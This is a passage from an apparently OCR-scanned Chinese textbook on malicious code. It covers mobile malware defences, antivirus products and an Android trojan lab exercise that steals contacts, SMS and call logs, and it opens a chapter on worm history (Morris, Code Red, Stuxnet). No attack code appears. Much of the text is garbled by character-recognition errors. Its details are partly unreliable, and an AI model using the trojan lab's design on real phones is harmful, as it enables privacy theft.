velasco. sis 文件 。 像 Cabir. H 病毒 一 样 ,Lasco. A 在 第 一 个 目标 离开 范围 后 ,能够 发 现 新 目 
标 。 除 了 通过 蓝牙 发 送 日 里 外 ,Lasco. A 也 能 够 通过 将 日 号 舱 入 手机 中 发 现 的 SIS 文件 来 
复制 。 一 个 感染 的 SIS 文件 被 复制 到 男 一 个 手机 上 ,Lasco. A 安装 会 在 首次 安装 任务 内 部 
开始 ,询问 用 户 是 否 安 涉 Velasco。 


6.6 移动 终 羡 恶意 代码 的 防 汇 


了 解 了 移动 终端 恶意 代码 的 危害 , 接 下 来 需要 关心 的 问题 就 是 如 何 防范 这 些 恶 意 代码 ， 
使 月 己 的 手持 设备 尽量 免 受 或 少 受 安全 威胁 。 其 主要 防范 措施 如 下 。 

1. 注意 来 电信 息 

当 对 方 的 电话 打 过 来 时 ,正常 情况 下 ,屏幕 上 显示 的 应 该 是 来 电 电 话 号 码 。 如 果 用 户 发 
现 显 示 别 的 字样 或 奇异 的 符号 ,应 不 回答 或 立即 把 电话 关闭 。 

2. 谨慎 网 络 下 载 

恶意 代码 要 想 侵 入 终端 设备 ,捆绑 到 下 载 程序 上 是 一 个 重要 途径 。 因 此 , 当 用 户 经 手机 
上 网 时 ,尽量 不 要 下 载 信 息 和 资料 ,如 果 需 要 下 载 手机 铃声 或 图 片 ,应 该 到 正规 网 站 进行 下 
载 ,即使 出 现 问 题 也 可 以 找到 源头 。 

3. 不 接收 怪异 短信 

短信 息 ( 彩 信 ) 中 可 能 存在 着 恶意 代码 ,短信 息 的 收发 越 来 越 成 为 移动 通信 的 一 个 重要 
方式 ,然而 短信 息 也 是 感染 手机 恶意 代码 的 一 个 重要 途径 。 当 用 户 接 到 怪异 的 短信 时 应 当 
立即 删除 。 

4. 关闭 无 线 连 接 

采用 蓝牙 技术 和 红外 技术 的 手机 与 外 界 ( 包 括 手 机 之 间 ,手机 与 计算 机 之 间 ) 传 输 数据 
更 加 便捷 和 频繁 ,但 对 自己 不 了 解 的 信息 来 源 , 应 该 关 掉 蓝牙 或 红外 等 无 线 设 备 。 如 果 发 现 
自己 的 蓝牙 或 红外 手机 出 现 了 恶意 代码 ,应 及 时 问 厂商 或 软件 公司 询问 并 安装 补丁 。 

5. 关注 安全 信息 

关注 主流 信息 安全 厂商 提供 的 资讯 信息 ,及 时 了 解 智 能 移动 终端 设备 病毒 的 发 展现 状 
和 发 作 现 象 ,做 到 防 患 于 未 然 。 


6.7 移动 终端 安全 防护 工具 


随 着 智能 手机 恶意 代码 的 肆意 传播 和 产生 的 严重 危害 ,在 用 户 提高 安全 意识 和 做 出 安 
全 反应 的 同时 ,移动 终端 恶意 代码 也 引起 了 国内 外 的 安全 厂商 和 手机 生产 商 的 高 度 重视 。 
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各 个 安全 厂商 纷纷 推出 了 运行 于 智能 手机 平台 的 安全 软件 。 
6.7.1 国外 移动 终端 安全 防护 工具 


1. BitDefender 手机 杀毒 软件 

BitDefender 手机 杀毒 软件 是 用 来 保护 移动 终端 免 受 恶意 代码 入 侵 的 。 该 软件 主要 包 
括 两 个 独立 的 模块 : 病毒 查 杀 模块 和 日 动 更 新 模块 。 病 毒 查 杀 模 块 运行 于 移动 终端 设备 
上 ,并 为 设备 提供 实时 保护 。 上 月 动 更 新 模块 运行 于 PC 上 ,用 来 安装 配置 移动 设备 上 的 病毒 
查 杀 模 块 ,同时 提供 病毒 库 更 新 功能 。 其 主要 特征 是 实时 保护 ,病毒 扫描 和 清除 、 容 易 更 新 
以 及 专业 技术 文 持 。 

2. F-Secure 手机 杀毒 软件 

分 兰 的 F-Secure Corporation 在 Cabir 病毒 被 发 现 后 即 投 入 手机 病毒 查 杀 市 场 , 现 已 经 
开发 出 涵盖 主要 智能 手机 平台 的 手机 安全 产品 。 诺 基 亚 公司 也 宣布 ,为 了 更 好 地 维护 手机 
安全 ,在 其 S60 3rd 版 本 的 手机 上 统一 安装 F-Secure 公司 的 反 病 毒 软件 。 而 且 今 后 凡是 代 
号 为 E 系列 的 手机 都 可 以 直接 从 诺基亚 公司 网 站 的 目录 服务 中 下 载 反 病毒 客户 端 。N71 
系列 手机 的 反 病 毒 软件 则 被 事先 安置 在 手机 的 储存 卡 上 和 手机 一 起 出 售 。 

3. McAfee Mobile Security 

McAfee Mobile Security 是 专 为 移动 生态 系统 设计 构造 和 实施 的 平台 ,可 前 脆性 地 保 
护 移 动 设备 免 受 安全 威胁 .漏洞 和 技术 小 用 的 侵扰 。 它 让 制造 商 有 机 会 增加 输入 来 源 、 使 目 
己 的 设备 独树一帜 以 及 提供 高 品质 的 产品 。 它 能 够 在 200ms 内 检测 到 恶意 软件 。 在 发 现 
病毒 时 , 它 会 清除 病毒 ,防止 其 传播 。 通 过 保障 客户 的 移动 网 络 设 备 的 安全 ,来 保障 运营 商 
合作 伙伴 的 网 络 安全 。McAfee Virus Scan Mobile 的 安装 和 运行 时 要 求 非常 低 , 散 和信 式 版 
本 所 占用 的 设备 空间 不 超过 500 KB。 

4. Trend Micro Mobile Security 

总 部 位 于 日 本 东京 和 美国 硅谷 的 Trend Micro Corporation 针对 智能 手机 用 户 推 出 了 
免费 的 Trend Micro Mobile Security 解决 方案 ,通过 这 种 解决 方案 ,趋势 能 够 为 客户 通信 、 
娱乐 设备 提供 实时 .可 在 线 更 新 的 安全 保护 。 趋 势 科 技 的 移动 安全 精灵 为 智能 数字 移动 设 
备 提供 了 各 种 病毒 威胁 保护 以 及 SMS 垃圾 短信 过 滤 功 能 。 

5. Kaspersky 手机 安全 软件 

俄罗斯 的 Kaspersky Lab 已 经 推出 针对 Symbian OS 智能 手机 的 杀毒 软件 。 这 个 软件 
名 为 “Anti-Virus Mobile 2. 0”, 它 能 够 阻止 手机 可 疑 程序 的 运行 。 安 装 了 了 Anti-Virus 
Mobile 2.0 的 用 户 可 以 通过 WAP 或 者 HTTP 方式 下 载 卡 巴 斯 基 的 病毒 升级 库 。 据 悉 ， 
Anti-Virus Mobile 2. 0 兼容 Symbian 6.1、7.0s、8.0、8.10OS 以 及 Series 60 手机 平台 。 

6. Symantec 手机 安全 软件 

Symantec Mobile Security Corporate Edition for Symbian 为 智能 型 手机 提供 整合 式 防 
毒 及 防火 墙 功 能 。 它 针对 所 有 Symbian 档案 型 的 恶意 威胁 (如 病毒 ,木马 程序 ) 提 供 了 主动 
式 防 护 。 集 中 化 管理 让 系统 管理 员 能 执行 安全 政策 ,而 月 动 更 新 则 可 让 半 置 上 的 防护 能 力 
维持 在 最 新 状态 。 系 统 的 主要 功能 是 实时 的 日 动 及 手动 病毒 扫描 功能 可 保护 智能 型 手机 档 
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案 系 统 中 储存 的 档案 。 防 火 墙 使 用 通信 协议 及 通信 端口 过 滤 , 保 护 传 输 中 的 数据 及 应 用 程 
序 。 透 过 LiveUpdate 提供 无 线 安全 与 应 用 程序 更 新 功能 ,让 效 置 上 的 防护 能 力 保 持 在 最 新 


6.7.2 国内 移动 终端 安全 防护 工具 


1. 360 手机 卫士 


360 手机 卫士 是 一 款 免 费 的 手机 安全 软件 , 集 防 垃圾 短信 、 防 骚扰 电话 、 防 隐私 泄露 ,对 
手机 进行 安全 扫 摘 、 联 网 云 查 杀 恶意 软件 、 软 件 安装 实时 检测 .流量 使 用 全 掌握 .系统 清理 手 
机 加 速 、 归 属地 显示 及 查询 等 功能 于 一 里。 为 用 户 市 来 全 方位 的 手机 安全 及 隐私 保护 ,是 手 
机 的 必 备 软件 。 目 前 ,提供 Android\iPhone、Symbian 等 多 个 版 本 。 由 于 360 最 先 在 计算 机 
杀毒 领域 提供 免费 服务 , 且 技 术 过 人 硬 , 拥 有 大 量 的 用 户 群 。 

2. 腾讯 手机 管家 


腾讯 手机 管家 ( 原 QQ 手机 管家 ) 是 腾讯 旗下 一 款 永久 免费 的 手机 安全 与 管理 软件 。 功 
能 包括 病毒 查 杀 骚扰 拦截 、 软 件 权 限 管理 .手机 防盗 及 安全 防护 ,用 户 流量 监控 ,空间 清理 、 
体检 加 速 、 软 件 管理 等 高 端 智 能 化 功能 。 其 杀毒 云 引 擎 更 强大 ,基于 海量 云 安全 数据 的 杀毒 
云 引 擎 ,对 手机 可 以 全 盘查 杀 病 毒 。 

据 QuestMobile 监测 数据 显示 ,在 2015 年 6 月 安 卓 端 APP 月 度 活 跃 用 户 数 与 渗透 率 
两 项 重要 数据 上 ,腾讯 手机 管家 均 已 跃 居 行业 第 一 。2015 年 8 月 APP(Android 十 1OS) 月 度 
活跃 用 户 数 达到 12 011 万 ,位 居 手 机 安全 APP 行业 第 一 。 

3. 百度 手机 卫士 


百度 手机 卫士 ( 原 安 卓 优化 大 师 ) 是 Android 平台 第 一 款 系统 优化 类 工具 ,诞生 至 今 已 
有 3 年 ,累积 了 超过 2 亿 的 忠实 用 户 。 百 度 手 机 卫士 是 一 款 功 能 超 强 的 手机 安全 软件 ,为 用 
户 免费 提供 系统 优化 .手机 加 速 .垃圾 清理 .骚扰 电话 拦截 .骚扰 短信 甄别 .手机 上 网 流量 保 
护 流量 监控 、 恶 意 软 件 查 杀 等 优质 服务 。 

百度 手机 卫士 以 病毒 查 杀 率 高 达 99. 7% 的 结果 ,通过 了 国际 权威 安全 评测 机 构 
AV-Test 的 评测 ,并 摘 得 桂冠 。2014 年 5 月 百度 手机 卫士 以 100%% 的 检测 率 、 零 误 报 的 完美 
成 绩 ,连续 四 次 斩获 AV-Test 的 评测 桂冠 。 


4. 金山 手机 卫士 
金山 手机 卫士 是 较 早 的 手机 杀毒 软件 之 一 ,以 手机 安全 为 核心 ,提供 有 流量 监控 、 恶 意 
扣 费 拦截 及 杀毒 功能 。 


金山 手机 卫士 是 金山 安全 软件 有 限 公 司 研发 的 一 款 手机 安全 产品 。 通 过 关闭 运行 中 软 
件 , 番 载 已 安装 软件 ,清理 垃圾 文件 ,清理 短信 收发 件 箱 等 加 快手 机 运行 速度 ;: 通过 检查 系 
统 漏洞 ,扫描 风险 软件 ,检查 扣 费 记录 等 解除 用 户 的 手机 安全 隐患, 保证 手机 及 话费 安全 ; 
同时 还 提供 包括 系统 信息 查看 、 进 程 管 理 、 重 启 手 机 、 内 存 压缩 等 实用 功能 。 

5. LBE 安全 大 师 

LBE 安全 大 师 是 Android 平台 上 首 球 主动 式 防御 软件 ,第 一 球 具 备 实时 监控 与 拦截 能 
力 的 手机 安全 软件 。LBE 安全 大 师 基 于 业界 首创 的 Android 平台 API 拦截 技术 ,能 够 实时 
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监控 与 拦截 系统 中 的 敏感 操作 ,动态 拦截 来 自己 知 和 未 知 的 各 种 威胁 ,避免 各 类 吸 费 软件 、 
广告 软件 乃至 木马 病毒 穷 取 用 户 手机 内 的 隐私 信息 以 及 可 能 产生 的 经 济 损失 。 

相 比 同类 软件 ,LBE 的 RAM 占用 更 低 ,ROM 占用 更 小 ,安装 包 体 积 也 是 其 他 安全 软 
件 的 一 半 , 更 加 省 电 、 小 巧 .简洁 。 


6.8 综合 实验 
综合 实验 七 : Android 手机 木马 实验 


【实验 目的 】 

(1) 擎 握手 机 木马 程序 的 机 制 。 

(2) 了 解 Android 程序 的 编制 。 

【实验 平台 】 

(1) 操作 系统 环境 : Windows 7。 

(2) 开发 工具 : Eclipse SDK 3.7. 2。 

(3) 开发 环境 : Android Development Toolkit 16. 0. 1 。 

(4) 测试 环境 : Android 模拟 器 4. 0. 3。 

【实验 资源 】 

代码 位 置 :“ 本 书 配套 素材 目录 :\ comprehensive\ch-8\androidhorse”。 

【实验 内 容 】 

(1) 在 计算 机 上 编译 本 书 配套 素材 目录 中 的 源 代 码 。 

(2) 把 编译 后 的 APK 包 安 疫 到 Android 手机 上 。 当 然 , 也 可 以 直接 安装 在 Android 的 
模拟 副 上 ,用 模拟 带 进 行 测试 。 

(3) 测试 的 主要 功能 有 各 种 关键 信息 的 获取 ,例如 ,通讯 录 、 短 信息 、 通 话 记 录 ,、 任 务 安 
排 等 关键 信息 的 获取 ,测试 程序 的 自动 运行 ,测试 程序 的 隐藏 等 。 


6.9 习 是 
一 、 填 空 题 
1. 移动 终端 恶意 代码 以 移动 终端 为 感染 对 象 , 以 和 为 平台 ,通过 无 
线 或 有 线 通信 等 方式 ,对 移动 终端 进行 攻击 ,从 而 造成 移动 终端 异常 的 各 种 不 良 程序 代码 。 
2. 根据 功能 不 同 ,移动 终端 主要 包括 和 两 大 类 。 


3. 根据 近 两 年 的 市 场 份 额 的 高 低 , 两 大 智能 手机 操作 系统 分 别 为 
和 


二 、 选 择 
1. 总 结 移动 终端 的 恶意 代码 感染 机 制 ,其 感染 途径 主要 分 为 (  )。 
A, 终端 一 终端 B. 终端 一 网 关 一 终端 


C，PC( 计 算 机 ) 一 终端 D. 终端 一 PC 
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2. 移动 终端 的 恶意 代码 的 攻击 方式 分 为 ( 


A. 短信 息 攻 击 B. 直接 攻击 手机 
C. 攻击 网 关 D. 攻击 漏洞 

E. 木马 型 恶意 代码 

、 思 考题 


1. 什么 是 移动 终端 恶意 代码 ,移动 终端 恶意 代码 有 哪些 攻击 方式 ? 
2. 手机 设计 或 手机 控制 软件 存在 哪些 漏洞 ? 
3. 试 论 述 防 范 移 动 终端 恶意 代码 的 方法 。 


第 7 和 于 里 虫 


提起 蠕虫 (Worm) ,给 大 家 印象 最 深 的 就 是 “冲击 波 ”“ 震 荡 波 “红色 代码 ”及 “ 尼 姆 达 ” 
等 著名 恶意 代码 。 这 些 著 名 的 蠕虫 在 2003 和 2004 年 达到 高 发 期 ,并 给 整个 信息 安全 领域 
留 下 了 不 可 磨灭 的 印记 。 实 际 上 英里 斯 蠕虫 (Morris Worm) 早 于 20 世纪 80 年 代 就 在 
DARPA 网 上 产生 了 ,2003 一 2005 年 则 是 蠕虫 发 展 的 高 峰 期 。 

经 过 多 年 的 沉寂 后 ,2010 年 的 “ 震 网 ”(Stuxnet) 又 把 蠕虫 推 到 了 前 台 。 由 于 震 网 病毒 
是 针对 工业 控制 网 络 , 因 此 引起 了 社会 各 界 关 注 。 随 后 出 现 的 “火焰 >”(Worm. Win32. 
Flame) 据 称 和 震 网 属于 同 源 病毒 。 

2017 年 爆发 的 WannaCry 是 典型 的 勒索 型 恶意 代码 ,但 其 传播 能 力 完 全 是 利用 了 蠕虫 
的 传播 技术 ,由 此 可 见 , 蠕 虫 的 传播 技术 仍然 发 挥 厦 巨大 影响 。 

本 童 将 简单 介绍 蠕虫 这 种 特殊 恶意 代码 的 一 些 基 本 概念 制作 思想 、 编 程 技 术 以 及 必要 
的 防范 方法 等 。 

本 章 学 习 目 标 

(1) 和 擎 握 晴 虫 的 概念 。 

(2) 擎 握 蠕 虫 的 发 展 过 程 。 

(3) 熟悉 蠕虫 的 编制 。 


7.1 蠕虫 的 基本 概念 


蠕虫 这 个 名 词 由 来 已 入 。 在 1982 年 ,Shock 和 Hupp 根据 The Shockwave Rider 一 书 
中 的 概念 提出 了 一 种 "蠕虫 X(Worm) 恶 意 程序 的 思想 。 

蠕虫 是 恶意 代码 的 一 种 , 它 的 传播 通常 不 需要 所 谓 的 激活 。 它 通过 分 布 式 网 络 来 散播 
特定 的 信息 或 错误 ,进而 造成 网 络 服务 遭 到 拒绝 并 发 生死 锁 。 关 于 蠕虫 的 传播 理论 和 模型 
请 参考 本 书 的 第 2 章 。 

一 般 认 为 , 晴 虫 是 一 种 通过 网 络 传播 的 恶性 病毒 , 它 具 有 恶意 代码 的 一 些 共 性 ,如 传播 
性 隐蔽 性 和 破坏 性 等 。 同 时 蠕虫 还 具有 目 己 特有 的 一 些 特 征 , 例 如 ,不 利用 文件 寄生 (有 的 
只 存在 于 内 存 中 )、 对 网 络 造成 拒绝 服务 ,以 及 和 黑客 技术 相 结合 等 。 在 破坏 程度 上 ,蠕虫 病 
毒 也 不 是 普通 病毒 所 能 比拟 的 ,蠕虫 病毒 可 以 在 数 小 时 内 草 延 至 整个 因特网 ,并 造成 网 络 
次 痪 。 


7.1.1 蠕虫 的 分 类 


根据 攻击 对 象 不 同 可 以 将 蠕虫 分 为 两 种 : 一 种 是 面向 企业 用 户 和 局 域 网 的 ,这 种 恶意 
代码 利用 系统 漏洞 ,主动 进行 攻击 ,可 以 使 整个 因特网 次 痪 。 它 主要 以 "红色 代码 交 尼 姆 达 ” 
以 及 最 新 的 “SQL 蠕虫 王 ?为 代表 。 另 外 一 种 是 针对 个 人 用 户 的 ,通过 网 络 ( 主 要 是 电子 邮 
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件 、 有 恶意 网 页 形式 ) 迅 速 传播 的 蠕虫 ,以 “ 爱 虫 “求职 信 ” 为 代表 。 

在 这 两 种 蠕虫 中 ,第 一 种 具有 很 大 的 主动 攻击 性 ,而 且 爆 发 也 有 一 定 的 突然 性 ,但 相对 
来 说 , 查 杀 这 种 恶意 代码 并 不 是 很 难 。 第 二 种 恶意 代码 的 传播 方式 比较 复杂 和 多 样 ,少数 利 
用 了 微软 的 应 用 程序 的 漏洞 ,更 多 的 是 利用 社会 工程 学 对 用 户 进 行 其 诈 和 诱骗 ,这 样 的 蠕虫 
造成 的 损失 是 非常 大 的 ,同时 也 是 很 难 根除 的 。 


7.1.2 蠕虫 和 其 他 恶意 代码 的 关系 


蠕虫 一 般 不 采取 利用 PE 格式 插入 文件 的 方法 ,而 是 复制 日 身 并 在 因特网 中 进行 传播 。 
传统 计算 机 病毒 的 传染 能 力主 要 是 针对 单 台 计算 机 内 的 文件 系统 而 言 , 而 蠕虫 的 传染 目标 
是 因特网 内 的 所 有 计算 机 。 局 域 网 条 件 下 的 共享 文件 夹 .电子 邮件 、 网 络 中 的 恶意 网 页 、 大 
量 存 在 着 漏洞 的 服务 天 等 都 是 蠕虫 传播 的 恨 好 途径 。 因 特 网 的 发 展 也 使 得 蠕虫 可 以 在 几 个 
小 时 内 查 延 至 全 球 ,而 且 蠕虫 的 主动 攻击 性 和 突然 爆发 性 使 得 人 们 手足 无 措 。 表 7-1 列 出 
了 蠕虫 病毒 和 传统 计算 机 病毒 的 区 别 。 


表 7-1 蠕虫 和 传统 病毒 由 的 区 别 


比较 项 目 传统 病毒 蠕 虫 


存在 形式 寄存 文件 独立 程序 
传染 机 制 答 主 程序 运行 主动 攻击 
传染 对 象 本 地 文件 计算 机 


特洛伊 木马 也 是 一 类 特殊 的 恶意 代码 。 里 虫 和 特洛伊 木马 之 间 的 联系 也 是 非常 有 趣 
的 。 一 般 而 言 ,这 两 者 的 共性 部 是 日 我 传播 ,部 不 感染 其 他 文件 , 即 不 需要 把 日 己 附 大 在 其 
他 箱 主 文件 上 。 在 传播 特性 上 ,它们 之 间 的 微小 区 别 是 ; 特洛伊 木马 需要 用 户 上 当 受 骗 来 
进行 传播 ,而 蠕虫 则 不 是 。 蠕 虫 包含 目 我 复制 程序 , 它 利 用 所 在 的 系统 进行 传播 。 但 也 有 些 
资料 认为 ,蠕虫 就 是 木马 ,木马 就 是 蠕虫。 

但 编者 认为 ,里 忠和 特洛伊 木马 的 主要 区 别 应 该 体现 在 破坏 目的 上 。 与 传统 计算 机 病 
毒 类 似 , 蠕 虫 的 破坏 目的 是 纯粹 的 破坏 ,例如 ,耗费 网 络 资源 、 删 除 用 户 数 据 等 。 而 木马 的 破 
坏 目 的 是 禄 取 , 秘 密 地 禄 取 用 户 的 信息 。 这 也 是 为 什么 难以 统计 特洛伊 木马 危害 程度 的 
原因 。 


7.1.3 蠕虫 的 危害 


计算 机 网 络 系统 的 建立 是 为 了 使 多 台 计 算 机 能 够 共享 数据 资料 和 外 部 资源 ,然而 这 也 
给 计算 机 蠕虫 市 来 了 更 为 有 利 的 生存 和 传播 的 环境 ，。 

在 网 络 环境 下 ,蠕虫 可 以 按 指数 增长 模式 进行 传染 。 它 侵入 计算 机 网 络 , 可 以 导致 计算 
机 网 络 效率 急剧 下 降 .系统 资源 遭 到 严重 破坏 , 短 时 间 内 造成 网 络 系统 的 次 痪 ,因此 网 络 环 
境 下 晴 虫 防治 曾经 是 计算 机 防毒 领域 的 研究 重点 。 接 下 来 给 出 几 个 典型 的 蠕虫 案例 。 

1988 年 11 月 发 生 了 第 一 起 蠕 毒 事件 。 美 国 康 东 尔 大 学 的 学 生 罗 伯 特 。 更 里 斯 编写 了 
第 一 个 网 络 恶 意 代码 一 一 英里 斯 蠕虫 (Morris Worm) 。 莫 里 斯 蠕虫 尝试 以 多 种 手段 获得 进 


@ 传统 病毒 是 指 感染 可 执行 文件 .数据 文件 和 引导 区 的 计算 机 病毒 。 
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入 新 网 络 的 权限 ,其 中 最 著名 的 是 finger 和 sendmail 漏洞 。 该 恶意 代码 在 美国 感染 了 超过 
6000 台 计 算 机 (包括 美国 国家 航空 和 航天 局 研究 院 、 军 事 基 地 和 部 分 大 学 的 计算 机 ) ,并 使 
它们 部 分 瘫痪 。 由 于 网 络 瘫痪 造成 的 损失 预计 超过 9600 万 美元 。 

1999 年 ,SirCam 蠕虫 爆发 。 该 恶意 代码 依靠 电子 邮件 传播 。 打 开 带 毒 附 件 后 , 它 会 自 
动 附着 在 正常 文件 上 。 发 作 时 会 删除 计算 机 中 的 所 有 文件 ,并 根据 用 户 的 邮件 地 址 自动 发 
送 病毒 附件 。 据 不 完全 统计 ,SirCam 所 造成 的 经 济 损失 约 为 12 亿美 元 。 

2001 年 7 月 “红色 代码 ”(Code Red) 以 及 “红色 代码 二 代 ”(Code Red 工 ) 出 现 。 该 恶意 
程序 主要 针对 因特网 上 的 服务 器 。 该 恶意 代码 能 够 迅速 传播 ， 并 造成 大 范围 的 访问 速度 下 
降 甚至 阻 断 。“ 红 色 代 码 ” 造 成 的 破坏 主要 是 修改 网 页 ,攻击 网 络 上 的 其 他 服务 器 。 被 攻击 
的 服务 器 又 可 以 继续 攻击 其 他 服务 器 。 

据 统 计 ,“ 求 职 信 ”情书 “红色 代码 ”等 蠕虫 病毒 的 生产 性 损失 额 分 别 为 90 亿美 元 、 
88 亿美 元 、26 亿美 元 。 艇 动 全 世界 的 蠕虫 *2003 蠕虫 王 ? 造 成 的 全 世界 范围 内 损失 额 也 高 
达 12 亿美 元 。 

2003 年 下 半年 在 全 球 发 作 的 “冲击 波 ” 蠕 虫 , 当选 为 当年 危害 最 大 的 计算 机 恶意 代码 。 
“冲击 波 ” 又 名 Lovsan 或 MSBlast。 它 利用 Windows 2000/Windows XP 的 漏洞 进行 传播 ， 
被 激活 后 会 回 用 户 展 示 一 个 恶意 对 话 框 ,提示 系统 将 关闭 。 该 恶意 代码 的 另 一 个 特点 是 , 它 
可 以 在 特定 日 期 向 Windows 升级 网 站 (Windowsupdate. com) 发 起 DDoS( 分 布 式 拒绝 服 
务 ) 攻 击 。 

2004 年 “震荡 波 ” 蠕 虫 出 现 , 它 也 利用 了 未 升级 的 Windows 2000/Windows XP 的 一 个 
系统 漏洞 。 该 恶意 代码 曾 导 致 法 国 一 些 新 闻 机 构 关 闭 卫 星 通信 、Delta 航空 公司 取消 数 个 航 
班 。 其 带 来 的 经 济 损失 以 千 万 美元 计算 。 

2010 年 的 “ 震 网 ”蠕虫 以 全 新 的 视角 给 世人 展示 了 蠕虫 这 种 恶意 代码 的 震慑 力 。 该 蠕 
虫 综合 利用 了 Windows 系统 的 7 个 漏洞 进行 传播 ,其 最 终 目 标 是 攻击 安装 了 Simatic 
WinCC 软件 的 主机 。 据 赛 门 铁 克 统计 ,2010 年 7 月 ,伊朗 感染 “ 震 网 ”的 主机 为 25% ,同年 
9 月 则 高 达 60% 。 据 称 该 恶意 代码 专门 定向 破坏 伊朗 核电 站 离心 机 等 要 害 目标 ,具有 人 鲜明 
的 地 域 性 和 目的 性 。 

2011 年 年 底 又 发 现 了 “ 震 网 ”病毒 的 新 变种 Duqu, 其 攻击 目标 通常 是 工业 控制 领域 的 
元 右 件 制造 商 。2012 年 ,又 出 现 了 威力 强大 的 恶意 代码 “火焰 ”(Flame), 它 也 是 震 网 的 变 
种 ,并 在 中 东 地 区 大 范围 传播 。 


7.1.4 “ 展 网 ”蠕虫 


震 网 ”D(C(Stuxnet) 是 一 种 Windows 平台 上 的 计算 机 蠕虫 ,2010 年 6 月 被 白俄罗斯 的 
安全 公司 VirusBlokAda 发 现 。“ 震 网 ?同时 利用 了 7 个 最 新 漏洞 进行 攻击 ,7 个 漏洞 中 ,有 
5 个 针对 Windows 系统 (其 中 4 个 是 全 新 的 零 日 漏洞 ) ,2 个 针对 Simatic WinCC 系统 。 


1. 震 网 的 传播 过 程 
“ 震 网 ”的 传播 途径 是 首先 感染 外 部 主机 ; 然后 感染 U 盘 , 利 用 快捷 方式 文件 解析 漏 


@ 严 宵 风 . 震 网 引发 的 网 络 安全 新 思考 . 信息 安全 与 技术 ,2011. 
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洞 ,传播 到 内 部 网 络 ; 在 内 部 网 络 中 ,通过 快捷 方式 解析 漏洞 `RPC 远程 执行 漏洞 .打印 机 
后 人 台 程 序 服务 漏 洞 等 ,实现 联网 主机 之 间 的 传播 ; 通过 伪装 RealTek 和 JMicron 两 大 公司 
的 数字 签名 ,顺利 绕 过 安全 产品 的 检测 ; 最 后 抵达 安装 了 Simatic WinCC 软件 的 主机 , 展 
开 攻 击 。“ 震 网 ”病毒 能 控制 关键 过 程 并 开启 一 连 串 执行 程序 ,最 终 导 致 整个 系统 自我 
毁灭 。 

据 赛 门 铁 克 的 研究 表明 ,截至 2010 年 8 月 6 日 , 几 个 受 影响 的 主要 国家 中 , 受 感 染 的 计 
算 机 伊朗 62 867 台 印度尼西亚 13 336 台 、 印 度 6552 台 、 美 国 2913 台 、 澳 大 利 亚 2436 台 、 
英国 1038 台 马来西亚 1013 台 .巴基斯坦 993 台 。 赛 门 铁 克 安 全 响应 中 心 高 级 主任 凯 文 。 
起 根 (Kevin Hogan) 指 出 ,在 伊朗 约 60% 的 个 人 计算 机 被 感染 ,这 意味 着 其 目标 是 当地 的 工 
业 基 础 设施 。 

2.“ 震 网 ”的 特点 

与 以 往 的 安全 事件 相 比 ,“ 震 网 ”攻击 呈现 出 多 种 特点 。 

(1) 攻击 目标 明确 。 通 常情 况 下 ,蠕虫 的 攻击 价值 在 于 其 传播 范围 的 广阔 性 和 攻击 目 
标的 普遍 性 。“ 震 网 ”的 攻击 目标 既 不 是 开放 主机 ,也 不 是 通用 软件 ,而 是 运行 于 Windows 
平台 ,向 被 部 署 在 与 外 界 隅 离 的 专用 局 域 网 中 ,被 广泛 用 于 钢铁 .汽车 .电力 .运输 \ 水 利 、 化 
工 \ 石油 等 核心 工业 领域 ,特别 是 国家 基础 设施 工程 的 Simatic WinCC 数据 采集 与 监视 控制 

专家 称 ,“ 震 网 ”是 一 次 精心 谋划 的 攻击 ,具有 精确 制导 的 “网 络 导弹 ”能 力 。 

(2) 采用 技术 先进 。“ 晨 网 ?病毒 一 下 子 利 用 了 微软 操作 系统 的 4 个 零 日 漏洞 ,使 每 一 
种 漏洞 发 挥 了 其 独特 的 作用 。“ 晨 网 ?运行 后 ,释放 出 两 个 驱动 文件 伪装 RealTek 和 
JMicron 的 数字 签名 ,以 躲避 杀毒 软件 的 查 杀 ,使 “ 震 网 ?具有 极 强 的 隐身 和 破坏 力 。“ 震 网 ” 
无 须 便 助 网 络 连接 进行 传播 ,只 要 计算 机 操作 员 将 被 病毒 感染 的 U 盘 插入 USB 接口 ,病毒 
就 会 在 神 不 知 鬼 不 觉 的 情况 下 取得 工业 用 计算 机 系统 的 控制 权 , 代 替 核 心 生产 控制 计算 机 
软件 对 工厂 其 他 计算 机 “发 号 施 令 ”。 

专家 称 ,一 旦 “ 震 网 ”病毒 软件 流入 黑市 出 售 ,后 果 将 不 堪 设 想 。 


7.2 蠕虫 的 特征 


旺 虫 和 普通 病毒 不 同 的 是 蠕虫 病毒 往往 能 够 利用 漏洞 ,这 里 的 漏洞 或 者 说 是 缺陷 ,可 以 
分 为 两 种 , 即 软 件 上 的 缺陷 和 人 为 的 缺陷 。 软 件 上 的 缺陷 ,如 远程 溢出 微软 IE 和 Outlook 
的 目 动 执行 漏洞 等 ,需要 软件 三 商 和 用 户 共同 配合 ,不 断 地 升级 软件 。 而 人 为 的 缺陷 ,主要 
是 指 计算 机 用 户 的 玻 忽 。 这 就 是 所 谓 的 社会 工程 学 , 当 收 到 一 封 带 着 病毒 的 求职 信和 邮件 时 ， 
大 多 数 人 都 会 抱 着 好 奇 去 点 击 。 对 于 企业 用 户 来 说 ,威胁 主要 集中 在 服务 顺和 大 型 应 用 软 
件 的 安全 上 ,而 对 个 人 用 户 而 言 , 主 要 是 防范 第 二 种 缺陷 。 里 虫 主要 有 以 下 特征 。 

1. 利用 漏洞 主动 进行 攻击 

此 类 病毒 主要 是 “红色 代码 ”和 “?* 尼 姆 达 ”, 以 及 至 今 依 然 肆虐 的 “求职 信 ?” 等 。 由 于 正 浏 
览 硕 的 漏洞 (iframe execCommand) ,使 得 感染 了 『“ 尼 姆 达 ” 病 毒 的 邮件 在 不 去 手动 打开 附件 
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的 情况 下 就 能 激活 病毒 ,而 此 前 即便 是 很 多 防 病毒 专家 也 一 直 认 为 ,市 有 病毒 附件 的 邮件 ， 
只 要 不 去 打开 附件 ,病毒 就 不 会 有 危害 。“ 红 色 代 码 ” 是 利用 了 微软 IIS 服务 器 软件 的 漏洞 
(idq. dll 远程 缓存 区 洲 出 ) 来 传播 的 ,“SQL 蠕虫 王 ” 病 毒 则 是 利用 了 人 微软 的 数据 库 系 统 的 一 
个 漏洞 进行 大 肆 攻 击 。 

2. 与 黑客 技术 相 结 合 

以 “红色 代码 ”为 例 , 感 染 后 计算 机 的 Web 目录 的 scripts 下 将 生成 一 个 root. exe, 可 以 
远程 执行 任何 命令 ,从 而 使 黑客 能 够 再 次 进入 ， 

3. 传染 方式 多 

蠕虫 病毒 的 传染 方式 比较 复杂 ,可 利用 的 传播 途径 包括 文件 .电子 邮件 、Web 服务 天 、 
